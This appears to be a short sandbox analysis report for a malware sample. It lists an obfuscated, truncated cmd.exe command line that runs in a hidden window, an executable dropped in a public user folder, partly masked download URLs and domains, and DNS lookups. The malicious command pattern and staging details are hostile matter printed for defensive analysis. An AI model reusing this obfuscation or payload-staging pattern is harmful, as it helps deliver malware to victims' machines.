Technical Information
- '<SYSTEM32>\cmd.exe' NkoOtVni CFzLJOFYnOIvddjYvKKawA MntOYkkRlibQS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %FwdCQboamiaIsHd%=QPVZHSrb&&set %PWzqNvHZLCjkF%=p&&set %EdYfjBd%=o^w&...
- C:\users\public\250302.exe
- C:\users\public\250302.exe
- 'aw#s.ws':80
- 'fl####-berlin.de':80
- 'ar####okearte.com':80
- http://aw#s.ws/UneuxB/
- http://fl####-berlin.de/UdUNS/
- http://ar####okearte.com/jSCCn/
- DNS ASK aw#s.ws
- DNS ASK fl####-berlin.de
- DNS ASK ar####okearte.com
- DNS ASK ca###trhy.cz
- DNS ASK av##lus.net
- '<SYSTEM32>\cmd.exe' NkoOtVni CFzLJOFYnOIvddjYvKKawA MntOYkkRlibQS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %FwdCQboamiaIsHd%=QPVZHSrb&&set %PWzqNvHZLCjkF%=p&&set %EdYfjBd%=o^w&...' (with hidden window)